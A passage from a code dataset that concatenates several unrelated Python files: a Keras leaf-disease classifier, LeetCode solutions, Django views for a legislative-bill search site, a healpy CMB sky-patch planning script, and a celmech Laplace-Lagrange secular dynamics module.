test 이미지 로드\r\n\r\n# 픽셀 1개는 1byte 사용 = 8비트 = 256가지를 표현 가능 -> 256으로 나눠서 0~1 사이의 값으로 표현\r\n# RGB 세가지가 있으므로 256X256X256가지의 색상을 표현 가능\r\nX_train = np.vstack(X_train) / 256.0\r\nY_train = np.array(Y_train).astype('float32')\r\nX_test = np.vstack(X_test) / 256.0\r\nY_test = np.array(Y_test).astype('float32')\r\n\r\nprint(X_train.shape) # (11896,3072) -> 11896 = trainset의 개수 (bacteria : 6808, healthy: 5088), 3072 = 특징의 개수 = 32(=이미지 너비) * 32(=이미지 높이) * 3(=RGB값)\r\nprint(Y_train.shape) # (11896,2) -> 2 = label의 개수(bacteria, healthy)\r\nprint(X_test.shape) # (2972.3072) ->2972 = trainset의 개수\r\nprint(Y_test.shape) # (2972,2)\r\n\r\ndef logistic_model(input_dim, output_dim):\r\n model = Sequential()\r\n model.add(Dense(output_dim, input_dim=input_dim,activation='sigmoid'))\r\n return model\r\n\r\nbatch_size = 100\r\nepoch = 50\r\nnum_label =2\r\ninput_dim = 32*32*3\r\n\r\nmodel = logistic_model(input_dim,num_label)\r\nmodel.summary()\r\n\r\ndef precision_threshold(threshold=0.5):\r\n def precision(y_true, y_pred):\r\n \"\"\"Precision metric.\r\n Computes the precision over the whole batch using threshold_value.\r\n \"\"\"\r\n threshold_value = threshold\r\n # Adaptation of the \"round()\" used before to get the predictions. Clipping to make sure that the predicted raw values are between 0 and 1.\r\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), threshold_value), K.floatx())\r\n # Compute the number of true positives. Rounding in prevention to make sure we have an integer.\r\n true_positives = K.round(K.sum(K.clip(y_true * y_pred, 0, 1)))\r\n # count the predicted positives\r\n predicted_positives = K.sum(y_pred)\r\n # Get the precision ratio\r\n precision_ratio = true_positives / (predicted_positives + K.epsilon())\r\n return precision_ratio\r\n return precision\r\n\r\ndef recall_threshold(threshold = 0.5):\r\n def recall(y_true, y_pred):\r\n \"\"\"Recall metric.\r\n Computes the recall over the whole batch using threshold_value.\r\n \"\"\"\r\n threshold_value = threshold\r\n # Adaptation of the \"round()\" used before to get the predictions. Clipping to make sure that the predicted raw values are between 0 and 1.\r\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), threshold_value), K.floatx())\r\n # Compute the number of true positives. Rounding in prevention to make sure we have an integer.\r\n true_positives = K.round(K.sum(K.clip(y_true * y_pred, 0, 1)))\r\n # Compute the number of positive targets.\r\n possible_positives = K.sum(K.clip(y_true, 0, 1))\r\n recall_ratio = true_positives / (possible_positives + K.epsilon())\r\n return recall_ratio\r\n return recall\r\n\r\noptimizer = Adam(lr=0.001)\r\nmodel.compile(optimizer=optimizer, loss='binary_crossentropy',metrics=['accuracy',precision_threshold(0.5),recall_threshold(0.5)]) #optimizer를 adam으로도 바꿔보자\r\nhistory = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epoch, verbose=1)\r\n\r\nplt.plot(history.history['loss'],label='loss')\r\nplt.xlabel('epoch')\r\nplt.title('lateblight_yellowleafcurl')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['acc'],label='accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['precision'],label='precision')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nplt.plot(history.history['recall'],label='recall')\r\nplt.xlabel('epoch')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\n\r\njson_string = model.to_json()\r\nopen('./lateblight_yellowleafcurl/weight/'+str(epoch)+'/lateblight_yellowleafcurl.json','w').write(json_string)\r\nmodel.save_weights('./lateblight_yellowleafcurl/weight/'+str(epoch)+'/lateblight_yellowleafcurl.h5')\r\nprint('model save')","sub_path":"OVO/lateblight_yellowleafcurl.py","file_name":"lateblight_yellowleafcurl.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251112507","text":"# 给定一个可包含重复数字的序列,返回所有不重复的全排列。 \n# \n# 示例: \n# \n# 输入: [1,1,2]\n# 输出:\n# [\n# [1,1,2],\n# [1,2,1],\n# [2,1,1]\n# ] \n# Related Topics 回溯算法 \n# 👍 384 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n nums.sort()\n res = []\n def dfs(nums, ans):\n if not nums:\n res.append(ans)\n return\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n dfs(nums[:i] + nums[i+1:], ans + [nums[i]])\n dfs(nums, [])\n return res\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_03/[47]全排列 II.py","file_name":"[47]全排列 II.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503597362","text":"\"\"\"\n views that are specific to a state/region\n\"\"\"\nimport re\nimport urllib\nfrom collections import defaultdict\n\nfrom django.shortcuts import redirect, render\nfrom django.http import Http404\nfrom django.conf import settings\nfrom django.template.defaultfilters import striptags\n\nfrom billy.models import db, Metadata, DoesNotExist, Bill\nfrom billy.models.pagination import CursorPaginator\nfrom ..forms import get_state_select_form\nfrom .utils import templatename, ListViewBase\n\n\ndef state_selection(request):\n '''Handle submission of the state selection form\n in the base template.\n '''\n form = get_state_select_form(request.GET)\n abbr = form.data.get('abbr')\n if not abbr or len(abbr) != 2:\n return redirect('homepage')\n return redirect('state', abbr=abbr)\n\n\ndef state(request, abbr):\n report = db.reports.find_one({'_id': abbr})\n try:\n meta = Metadata.get_object(abbr)\n except DoesNotExist:\n raise Http404\n\n # count legislators\n legislators = meta.legislators({'active': True}, {'party': True,\n 'chamber': True})\n # Maybe later, mapreduce instead?\n party_counts = defaultdict(lambda: defaultdict(int))\n for leg in legislators:\n if 'chamber' in leg: # if statement to exclude lt. governors\n party_counts[leg['chamber']][leg['party']] += 1\n\n if 'lower_chamber_name' not in meta:\n chambers_to_use = ('upper',)\n else:\n chambers_to_use = ('upper', 'lower')\n\n chambers = []\n\n for chamber in chambers_to_use:\n res = {}\n\n # chamber metadata\n res['type'] = chamber\n res['title'] = meta[chamber + '_chamber_title']\n res['name'] = meta[chamber + '_chamber_name']\n\n # legislators\n res['legislators'] = {\n 'count': sum(party_counts[chamber].values()),\n 'party_counts': dict(party_counts[chamber]),\n }\n\n # committees\n res['committees_count'] = meta.committees({'chamber': chamber}).count()\n\n res['latest_bills'] = meta.bills({'chamber': chamber}).sort(\n [('action_dates.first', -1)]).limit(2)\n res['passed_bills'] = meta.bills({'chamber': chamber}).sort(\n [('action_dates.passed_' + chamber, -1)]).limit(2)\n\n chambers.append(res)\n\n joint_committee_count = meta.committees({'chamber': 'joint'}).count()\n\n # add bill counts to session listing\n sessions = meta.sessions()\n for s in sessions:\n try:\n s['bill_count'] = (\n report['bills']['sessions'][s['id']]['upper_count']\n + report['bills']['sessions'][s['id']]['lower_count'])\n except KeyError:\n # there's a chance that the session had no bills\n s['bill_count'] = 0\n\n return render(request, templatename('state'),\n dict(abbr=abbr, metadata=meta, sessions=sessions,\n chambers=chambers,\n joint_committee_count=joint_committee_count,\n statenav_active='home'))\n\n\ndef not_active_yet(request, args, kwargs):\n try:\n metadata = Metadata.get_object(kwargs['abbr'])\n except DoesNotExist:\n raise Http404\n\n return render(request, templatename('state_not_active_yet'),\n dict(metadata=metadata, statenav_active=None))\n\n\ndef search(request, abbr):\n\n if not request.GET:\n return render(request, templatename('search_results_no_query'),\n {'abbr': abbr})\n\n search_text = request.GET['search_text']\n\n # First try to get by bill_id.\n if re.search(r'\\d', search_text):\n url = '/%s/bills?' % abbr\n url += urllib.urlencode([('search_text', search_text)])\n return redirect(url)\n\n else:\n found_by_id = False\n if settings.ENABLE_ELASTICSEARCH:\n kwargs = {}\n if abbr != 'all':\n kwargs['state'] = abbr\n bill_results = Bill.search(search_text, **kwargs)\n else:\n spec = {'title': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n bill_results = db.bills.find(spec)\n\n # add sorting\n bill_results = bill_results.sort([('action_dates.last', -1)])\n\n # Limit the bills if it's a search.\n more_bills_available = (5 < bill_results.count())\n bill_results = bill_results.limit(5)\n\n # See if any legislator names match.\n spec = {'full_name': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n legislator_results = db.legislators.find(spec)\n more_legislators_available = (5 < legislator_results.count())\n legislator_results = legislator_results.limit(5)\n\n if abbr != 'all':\n metadata = Metadata.get_object(abbr)\n else:\n metadata = None\n\n return render(request, templatename('search_results_bills_legislators'),\n dict(search_text=search_text,\n abbr=abbr,\n metadata=metadata,\n found_by_id=found_by_id,\n bill_results=bill_results,\n more_bills_available=more_bills_available,\n legislators_list=legislator_results,\n more_legislators_available=more_legislators_available,\n bill_column_headers=('State', 'Title', 'Session', 'Introduced',\n 'Recent Action',),\n rowtemplate_name=templatename('bills_list_row_with'\n '_state_and_session'),\n show_chamber_column=True,\n statenav_active=None))\n\n\nclass ShowMoreLegislators(ListViewBase):\n template_name = templatename('object_list')\n rowtemplate_name = templatename('legislators_list_row')\n statenav_active = None\n column_headers = ('', 'State', 'Name', 'District', 'Party', 'Chamber')\n use_table = True\n description_template = '''\n {{metadata.name}}\n legislator names containing \"{{request.GET.search_text}}\"'''\n title_template = striptags(description_template)\n\n def get_queryset(self):\n abbr = self.kwargs['abbr']\n search_text = self.request.GET['search_text']\n\n # See if any legislator names match.\n spec = {'full_name': {'$regex': search_text, '$options': 'i'}}\n if abbr != 'all':\n spec.update(state=abbr)\n legislator_results = db.legislators.find(spec)\n return CursorPaginator(legislator_results, show_per_page=10,\n page=int(self.request.GET.get('page', 1)))\n","sub_path":"billy/web/public/views/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80361817","text":"from collections import Counter\nclass Solution:\n def findAnagrams(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: List[int]\n \"\"\"\n res=[]\n pCounter=Counter(p)\n sCounter=Counter(s[0:len(p)-1])\n for i in range(len(p)-1,len(s)):\n sCounter[s[i]] += 1\n if sCounter == pCounter :\n res.append(i-len(p)+1)\n headLetter = s[i-len(p)+1]\n sCounter[headLetter]-=1\n if sCounter[headLetter] == 0:\n del sCounter[headLetter]\n return res\n \n \n ","sub_path":"Find All Anagrams in a String.py","file_name":"Find All Anagrams in a String.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162801315","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\nimport healpy as hp\n\nsys.path.append(\"..\")\nfrom plug_holes import plug_holes\n\ndec_min = -70\ndec_max = 70\ndec_step = 20\ndec_overlap = 5\nra_step = 10\nra_overlap = 5\n\n# Number of discrete colors to use in plotting\n# intensity and polarization amplitude\nnbin = 10\n# fwhm, tlim, plim = 10, 300 * 1e-6, 1 * 1e-7\nfwhm, tlim, plim = 1, 500 * 1e-6, 2 * 1e-7\nlmax = 512\n\nwpatch = 10\nhpatch = 20\n\n# south_tier_ranges = [(60, 30), (75, 0), (100, -65)] # Tier 1, 2, 3\nsouth_tier_ranges = [(70, 20), (85, -10), (100, -65)] # Tier 1, 2, 3\n# north_tier_ranges = [(165, 135), (175, 125), (230, 110)] # Tier 1, 2, 3\nnorth_tier_ranges = [(175, 125), (185, 115), (230, 110)] # Tier 1, 2, 3\n\n\ndef get_tier(left, right):\n tier = 4\n for ranges in [south_tier_ranges, north_tier_ranges]:\n for i, lims in enumerate(ranges):\n if left <= lims[0] and right >= lims[1]:\n return i + 1\n return tier\n\n\nsouth_left = 100\nsouth_top = [\n # Tier 3\n -15, # 100\n -15,\n # Tier 2\n -20, # 90\n -20,\n -25, # 80\n # Tier 1\n -25,\n -30, # 70\n -30,\n -30, # 60\n # Tier 2\n -35,\n -35, # 50\n -35,\n -30, # 40\n -35,\n -35, # 30\n -35,\n -35, # 20\n # Tier 3\n -30,\n -30, # 10\n -25,\n -25, # 0,\n -25,\n -20, # -10\n -20,\n -15, # -20\n -15,\n -15, # -30\n -10,\n -5, # -40\n 0,\n 5, # -50\n 5,\n]\n\nnorth_left = 230\nnorth_top = [\n # Tier 3\n -20, # 230\n -25,\n -25, # 220\n -25,\n -25, # 210\n -25,\n -25, # 200\n -20,\n -10, # 190\n 0,\n 10, # 180\n 10,\n # Tier 2\n 10, # 170\n # Tier 1\n 15,\n 10, # 160\n 5,\n 10, # 150\n 10,\n # Tier 2\n 15, # 140\n 15,\n 20, # 130\n 20,\n # Tier 3\n 20, # 120\n]\n\"\"\"\n# left, top, right, bottom\nprimary_south = [80, -30, 30, -50]\nprimary_north = [175, 10, 135, -10]\n\nsecondary_south = [95, -10, 15, -60]\nsecondary_north = [180, 40, 125, -20]\n\ntertiary_south = [100, -20, -60, -40]\ntertiary_north = [210, 20, 110, 0]\n\"\"\"\n\n# target_top = -30\n# target_bottom = -50\n# target_left = 60\n# target_right = 330\n\nnside = 512\nnpix = 12 * nside ** 2\n\nhfi_pipe = \"/global/cfs/cdirs/cmb/data/planck2020/npipe/aux\"\nsky_model_cache = \"/global/cfs/cdirs/cmb/data/planck2020/npipe/npipe6v20_sim/skymodel_cache\"\nfn_sync = f\"{sky_model_cache}/sky_model_070GHz_nside1024_quickpol_cfreq_zodi.fits\"\nfn_dust = f\"{sky_model_cache}/sky_model_143GHz_nside2048_quickpol_cfreq_zodi.fits\"\nfn_mask = f\"{hfi_pipe}/psmask_030_nest.fits\"\nfn_cmb = f\"{hfi_pipe}/COM_CMB_IQU-commander_1024_R2.02_full.fits\"\nmask = hp.read_map(fn_mask, nest=True)\nnside_mask = hp.get_nside(mask)\ncmb = hp.read_map(fn_cmb, nest=True)\n\nplt.figure(figsize=[18, 8])\nplt.suptitle(\"fwhm = {} deg, nbin = {}\".format(fwhm, nbin))\n\n\ndef get_p(fn, cmb, psmask, fwhm, tlim, plim):\n \"\"\"\n Return the intensity and polarization amplitude\n of the file in Galactic and Equatorial coordinates\n\n The maps is first CMB-subtracted. Outputs are\n smoothed to `fwhm` [degrees]\n \"\"\"\n nside_cmb = hp.get_nside(cmb)\n m_gal = hp.read_map(fn, range(3), nest=True)\n # Subtract CMB\n m_gal = hp.ud_grade(m_gal, nside_cmb, order_in=\"NEST\")\n m_gal[0] -= cmb\n # Mask out point sources\n nside_mask = hp.get_nside(psmask)\n m_gal = hp.ud_grade(m_gal, nside_mask, order_in=\"NEST\")\n m_gal[:, mask == 0] = hp.UNSEEN\n plug_holes(m_gal, nest=True, in_place=True, verbose=True)\n # Smooth to FWHM\n m_gal = hp.ud_grade(m_gal, 512, order_in=\"NEST\", order_out=\"RING\")\n m_gal = hp.smoothing(m_gal, fwhm=np.radians(fwhm), lmax=lmax, iter=0)\n # Set zero point\n i_gal = m_gal[0] - np.amin(m_gal[0])\n # Measure polarization amplitude\n p_gal = np.sqrt(m_gal[1] ** 2 + m_gal[2] ** 2)\n # Saturate the color scale\n i_gal[i_gal < tlim] = 0\n p_gal[p_gal < plim] = 0\n # Rotate and interpolate to equatorial coordinates\n i_equ = np.zeros(npix)\n p_equ = np.zeros(npix)\n rot = hp.Rotator(coord=\"CG\")\n buflen = 1024\n for pix_start in range(0, npix, buflen):\n pix_stop = min(npix, pix_start + buflen)\n pix = np.arange(pix_start, pix_stop)\n vec_equ = hp.pix2vec(nside, pix)\n vec_gal = rot(vec_equ)\n theta, phi = hp.vec2dir(vec_gal)\n ival = hp.get_interp_val(i_gal, theta, phi)\n pval = hp.get_interp_val(p_gal, theta, phi)\n i_equ[pix] = ival\n p_equ[pix] = pval\n return i_gal, p_gal, i_equ, p_equ\n\n\nisync_gal, psync_gal, isync_equ, psync_equ = get_p(fn_sync, cmb, mask, fwhm, tlim, plim)\nidust_gal, pdust_gal, idust_equ, pdust_equ = get_p(fn_dust, cmb, mask, fwhm, tlim, plim)\n\n\ndef plot_p(maps, sub, title, nbin, coord, gr=30):\n \"\"\"\n Plot the given map using only `nbin` distinct colors\n If `maps` contains several maps, the plotting color is\n chosen based on the most intense map: if any of the given\n \"\"\"\n sorted_maps = [np.sort(m) for m in maps]\n lims = np.arange(nbin) / nbin\n p = np.zeros(npix)\n for ilim, lim in enumerate(lims):\n for m, msorted in zip(maps, sorted_maps):\n val = msorted[int(npix * lim)]\n p[m > val] = lim\n hp.mollview(p, xsize=2400, sub=sub, title=title, coord=coord, cmap=\"bwr\")\n hp.graticule(gr)\n return p\n\n\nplot_p([isync_gal], [2, 4, 1], \"070GHz I\", nbin, \"G\")\nplot_p([psync_gal], [2, 4, 2], \"070GHz P\", nbin, \"G\")\nplot_p([idust_gal], [2, 4, 3], \"150GHz I\", nbin, \"G\")\nplot_p([pdust_gal], [2, 4, 4], \"150GHz P\", nbin, \"G\")\n\nplot_p([isync_equ], [2, 4, 5], \"070GHz I\", nbin, \"C\")\nplot_p([psync_equ], [2, 4, 6], \"070GHz P\", nbin, \"C\")\nplot_p([idust_equ], [2, 4, 7], \"150GHz I\", nbin, \"C\")\nplot_p([pdust_equ], [2, 4, 8], \"150GHz P\", nbin, \"C\")\n\nplt.savefig(\"priority_by_pixel_fwhm{:02}_nbin{:02}.comp.png\".format(fwhm, nbin))\n\nplt.figure(figsize=[18, 6])\nplt.suptitle(\"fwhm = {} deg, nbin = {}\".format(fwhm, nbin))\n\nplot_p(\n [isync_gal, psync_gal, idust_gal, pdust_gal],\n [1, 2, 1],\n \"070+150GHz\",\n nbin,\n \"G\",\n gr=15,\n)\npmap = plot_p(\n [isync_equ, psync_equ, idust_equ, pdust_equ],\n [1, 2, 2],\n \"070+150GHz\",\n nbin,\n \"C\",\n gr=15,\n)\n\n\ndef plot_patch(patch, tier):\n left, top, right, bottom = patch\n color, lw = [(\"red\", 3), (\"black\", 2), (\"grey\", 2)][tier - 1]\n lon = [left, left, right, right, left]\n lat = [bottom, top, top, bottom, bottom]\n n = len(lon)\n x = np.arange(n) / (n - 1)\n xfull = np.linspace(0, 1, 100 * n)\n lonfull = np.interp(xfull, x, lon)\n latfull = np.interp(xfull, x, lat)\n hp.projplot(\n lonfull,\n latfull,\n \"-\",\n threshold=1,\n lonlat=True,\n color=color,\n lw=lw,\n alpha=0.8,\n coord=\"C\",\n zorder=(4 - tier) * 100,\n )\n\n\ndef add_patch(fout, patch, tier, mult=1):\n ra_stop, dec_start, ra_start, dec_stop = patch\n if ra_start < 0:\n ra_start += 360\n if ra_stop < 0:\n ra_stop += 360\n name = \"Tier{}DEC{:+04}..{:+04}_RA{:+04}..{:+04}\".format(\n tier, dec_start, dec_stop, ra_start, ra_stop\n )\n priority = [1, 1000, 1000000][tier - 1] * mult\n fout.write(\"--patch\\n\")\n fout.write(\n \"{}-1,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n name, priority, ra_start, dec_stop, ra_stop, dec_start\n )\n )\n # Add additional tiles to achieve SAT-like apodization with LAT\n fout.write(\"--patch\\n\")\n fout.write(\n \"{}-2,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n name, priority, ra_start, dec_stop+5, ra_stop, dec_start+5\n )\n )\n #fout.write(\"--patch\\n\")\n #fout.write(\n # \"{}-3,{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}\\n\".format(\n # name, priority, ra_start, dec_stop+10, ra_stop, dec_start+10\n # )\n #)\n\n\nwith open(\"patches_lat.txt\", \"w\") as fout:\n left = south_left\n for top in south_top:\n tier = get_tier(left, left - wpatch)\n patch = [left, top, left - wpatch, top - hpatch]\n plot_patch(patch, tier)\n add_patch(fout, patch, tier, mult=1)\n left -= 5\n\n left = north_left\n for top in north_top:\n tier = get_tier(left, left - wpatch)\n patch = [left, top, left - wpatch, top - hpatch]\n plot_patch(patch, tier)\n add_patch(fout, patch, tier, mult=10)\n left -= 5\n\nplt.savefig(\"priority_by_pixel_fwhm{:02}_nbin{:02}.full.png\".format(fwhm, nbin))\n","sub_path":"AoA/scan_strategies/chlat_for_chsat_s4/make_lat_tiles.py","file_name":"make_lat_tiles.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246186020","text":"import numpy as np\nimport warnings\nfrom . import Poincare\nfrom sympy import symbols, S, binomial, summation, sqrt, cos, sin, atan2, expand_trig,diff,Matrix\nfrom .disturbing_function import DFCoeff_C,eval_DFCoeff_dict,get_DFCoeff_symbol\nfrom scipy.linalg import expm\nfrom .poincare import single_true\n\n_rt2 = np.sqrt(2)\n_rt2_inv = 1. / _rt2 \n_machine_eps = np.finfo(np.float64).eps\n\nclass LaplaceLagrangeSystem(Poincare):\n r\"\"\"\n A class for representing the classical Laplace-Lagrange secular\n solution for a planetary system.\n \n Attributes\n ----------\n eccentricity_matrix : sympy.Matrix\n The matrix :math:`\\pmb{S}_e` appearing in the secular equations\n of motion for the eccentricity variables, \n\n .. math::\n \\frac{d}{dt}(\\eta_i + i\\kappa_i) = [\\pmb{S}_e]_{ij} (\\eta_j + i\\kappa_j)~.\n \n or, equivalently,\n\n .. math::\n \\frac{d}{dt}\\pmb{x} = -i \\pmb{S}_e \\cdot \\pmb{x}\n\n The matrix is given in symbolic form.\n inclination_matrix : sympy.Matrix\n The matrix :math:`\\pmb{S}_I` appearing in the secular equations\n of motion for the eccentricity variables, \n\n .. math::\n \\frac{d}{dt}(\\rho_i + i \\sigma_i ) =[\\pmb{S}_I]_{ij} (\\rho_j + i \\sigma_j)~.\n \n or, equivalently,\n\n .. math::\n \\frac{d}{dt}\\pmb{y} = -i \\pmb{S}_I \\cdot \\pmb{y}\n\n The matrix is given in symbolic form.\n Neccentricity_matrix : ndarray\n Numerical value of the eccentricity matrix :math:`\\pmb{S}_e`\n Ninclination_matrix : ndarray\n Numerical value of the inclination matrix :math:`\\pmb{S}_I`\n Tsec : float\n The secular timescale of the system, defined as the shortest\n secular period among the system's inclination and eccentricity\n modes.\n eccentricity_eigenvalues : ndarray\n Array of the eccentricity mode eigenvalues (i.e., secular frequencies)\n inclination_eigenvalues : ndarray\n Array of the inclination mode eigenvalues (i.e., secular frequencies)\n \"\"\"\n def __init__(self,G,poincareparticles=[]):\n super(LaplaceLagrangeSystem,self).__init__(G,poincareparticles)\n self.params = {S('G'):self.G}\n for i,particle in enumerate(self.particles):\n if i is not 0:\n m,mu,M,Lambda = symbols('m{0},mu{0},M{0},Lambda{0}'.format(i)) \n self.params.update({m:particle.m,mu:particle.mu,M:particle.M,Lambda:particle.Lambda})\n self.ecc_entries = {(j,i):S(0) for i in xrange(1,self.N) for j in xrange(1,i+1)}\n self.inc_entries = {(j,i):S(0) for i in xrange(1,self.N) for j in xrange(1,i+1)}\n self.tol = np.min([p.m for p in self.particles[1:]]) * np.finfo(np.float).eps\n ps = self.particles[1:]\n self.eta0_vec = np.array([p.eta for p in ps])\n self.kappa0_vec = np.array([p.kappa for p in ps]) \n self.rho0_vec = np.array([p.rho for p in ps])\n self.sigma0_vec = np.array([p.sigma for p in ps]) \n self._update()\n @classmethod\n def from_Poincare(cls,pvars):\n \"\"\"\n Initialize a Laplace-Lagrange system directly from a \n :class:`celmech.poincare.Poincare` object.\n \n Arguments\n ---------\n pvars : :class:`celmech.poincare.Poincare` \n Instance of Poincare variables from which to initialize\n Laplace-Lagrange system\n\n Returns\n -------\n system : :class:`celmech.secular.LaplaceLagrangeSystem`\n \"\"\"\n return cls(pvars.G,pvars.particles[1:])\n\n @classmethod\n def from_Simulation(cls,sim):\n \"\"\"\n Initialize a Laplace-Lagrange system directly from a \n :class:`rebound.Simulation` object.\n \n Arguments\n ---------\n pvars : :class:`rebound.Simulation` \n rebound simulation from which to initialize\n Laplace-Lagrange system\n\n Returns\n -------\n sim : :class:`celmech.secular.LaplaceLagrangeSystem`\n \"\"\"\n pvars = Poincare.from_Simulation(sim)\n return cls.from_Poincare(pvars)\n\n @property\n def eccentricity_matrix(self):\n return Matrix([\n [self.ecc_entries[max(i,j),min(i,j)] for i in xrange(1,self.N)]\n for j in xrange(1,self.N) \n ])\n\n @property\n def inclination_matrix(self):\n return Matrix([\n [self.inc_entries[max(i,j),min(i,j)] for i in xrange(1,self.N)]\n for j in xrange(1,self.N) \n ])\n @property \n def Neccentricity_matrix(self):\n return np.array(self.eccentricity_matrix.subs(self.params)).astype(np.float64)\n @property \n def Ninclination_matrix(self):\n return np.array(self.inclination_matrix.subs(self.params)).astype(np.float64)\n @property\n def Tsec(self):\n Omega_e = np.max( np.abs(self.eccentricity_eigenvalues()) )\n Omega_i = np.max( np.abs(self.inclination_eigenvalues()) )\n return 2 * np.pi / max(Omega_e,Omega_i)\n def _chop(self,arr):\n arr[np.abs(arr) j:\n particleIn = self.particles[indexIn]\n Cecc = get_DFCoeff_symbol(*js_dpomega,0,0,0,0,indexIn,indexOut)\n Cinc = get_DFCoeff_symbol(*js_dOmega,0,0,0,0,indexIn,indexOut)\n alpha = particleIn.a/particleOut.a\n assert alpha<1, \"Particles must be in order by increasing semi-major axis!\"\n Necc_coeff = eval_DFCoeff_dict(ecc_off_coeff,alpha)\n Ninc_coeff = eval_DFCoeff_dict(inc_off_coeff,alpha)\n self.params[Cecc] = Necc_coeff\n self.params[Cinc] = Ninc_coeff\n ecc_entry = prefactor * Cecc / sqrt(LambdaIn) / sqrt(LambdaOut)\n inc_entry = prefactor * Cinc / sqrt(LambdaIn) / sqrt(LambdaOut) / 4\n self.ecc_entries[(indexOut,indexIn)] = ecc_entry\n self.inc_entries[(indexOut,indexIn)] = inc_entry\n else:\n pass\n LmbdaI = S('Lambda{}'.format(i))\n self.ecc_entries[(i,i)] += 2 * prefactor * Cecc_diag / LmbdaI\n self.inc_entries[(i,i)] += 2 * prefactor * Cinc_diag / LmbdaI / 4\n\n def add_first_order_resonance_terms(self,resonances_dictionary):\n for indices,resonance_k in resonances_dictionary.items():\n self.add_first_order_resonance_term(*indices,resonance_k) \n\n def add_first_order_resonance_term(self,indexIn, indexOut,jres):\n \"\"\"\n Include a correction to the Laplace-Lagrange \n secular equations of motion that arise due to a nearby \n first-order mean motion resonance between two planets.\n\n Note-- corrections are not valid for planets in resonance!\n \n Arguments\n ---------\n indexIn : int\n Index of inner planet near resonance.\n indexOut : int\n Index of inner planet near resonance.\n jres : int\n Specify the jres:jres-1 mean motion resonance.\n \"\"\"\n assert indexIn < indexOut, \"Input 'indexIn' must be less than 'indexOut'.\"\n particleIn = self.particles[indexIn]\n particleOut = self.particles[indexOut]\n alpha = particleIn.a / particleOut.a\n G = symbols('G')\n mIn,muIn,MIn,LambdaIn = symbols('m{0},mu{0},M{0},Lambda{0}'.format(indexIn)) \n mOut,muOut,MOut,LambdaOut = symbols('m{0},mu{0},M{0},Lambda{0}'.format(indexOut)) \n \n CIn = get_DFCoeff_symbol(*[jres,1-jres,-1,0,0,0],0,0,0,0,indexIn,indexOut)\n COut = get_DFCoeff_symbol(*[jres,1-jres,0,-1,0,0],0,0,0,0,indexIn,indexOut)\n self.params[CIn] = eval_DFCoeff_dict(DFCoeff_C(*[jres,1-jres,-1,0,0,0],0,0,0,0),alpha)\n self.params[COut] = eval_DFCoeff_dict(DFCoeff_C(*[jres,1-jres,0,-1,0,0],0,0,0,0),alpha)\n aOut_inv = G*MOut*muOut*muOut / LambdaOut / LambdaOut \n eps = -G * mIn * mOut * aOut_inv\n omegaIn = G * G * MIn * MIn * muIn**3 / (LambdaIn**3)\n omegaOut = G * G * MOut * MOut * muOut **3 / (LambdaOut**3)\n domegaIn = -3 * G * G * MIn * MIn * muIn**3 / (LambdaIn**4)\n domegaOut = -3 * G * G * MOut * MOut * muOut**3 / (LambdaOut**4)\n kIn = 1 - jres\n kOut = jres\n k_Domega_k = kIn**2 * domegaIn + kOut**2 * domegaOut\n prefactor = (k_Domega_k / (kIn * omegaIn + kOut * omegaOut)**2) \n xToXIn = sqrt(2/LambdaIn)\n xToXOut = sqrt(2/LambdaOut)\n\n InIn = eps**2 * prefactor * CIn * CIn * xToXIn * xToXIn / 4\n InOut = eps**2 * prefactor * COut * CIn * xToXOut * xToXIn / 4\n OutOut = eps**2 * prefactor * COut * COut * xToXOut * xToXOut / 4\n \n self.ecc_entries[(indexIn,indexIn)] += InIn\n # Note-- only upper entries are stored so \n # changing (indexOut,indexIn) also implicitly \n # changes (indexIn,indexOut)\n self.ecc_entries[(indexOut,indexIn)] += InOut\n self.ecc_entries[(indexOut,indexOut)] += OutOut\n \nfrom .symplectic_evolution_operators import EvolutionOperator\nfrom .symplectic_evolution_operators import SecularDFTermsEvolutionOperator as DFOp\nclass LinearSecularEvolutionOperator(EvolutionOperator):\n def __init__(self,initial_state,dt,first_order_resonances={}):\n super(LinearSecularEvolutionOperator,self).__init__(initial_state,dt)\n LL_system = LaplaceLagrangeSystem.from_Poincare(self.state)\n for pair,res_j_list in first_order_resonances.items():\n for j in res_j_list:\n LL_system.add_first_order_resonance_term(*pair,j)\n self.ecc_matrix = LL_system.Neccentricity_matrix\n self.inc_matrix = LL_system.Ninclination_matrix\n self.ecc_operator_matrix = expm(-1j * self.dt * self.ecc_matrix)\n self.inc_operator_matrix = expm(-1j * self.dt * self.inc_matrix)\n\n @property\n def dt(self):\n return super().dt\n @dt.setter\n def dt(self,val):\n self._dt = val\n self.ecc_operator_matrix = expm(-1j * self.dt * self.ecc_matrix)\n self.inc_operator_matrix = expm(-1j * self.dt * 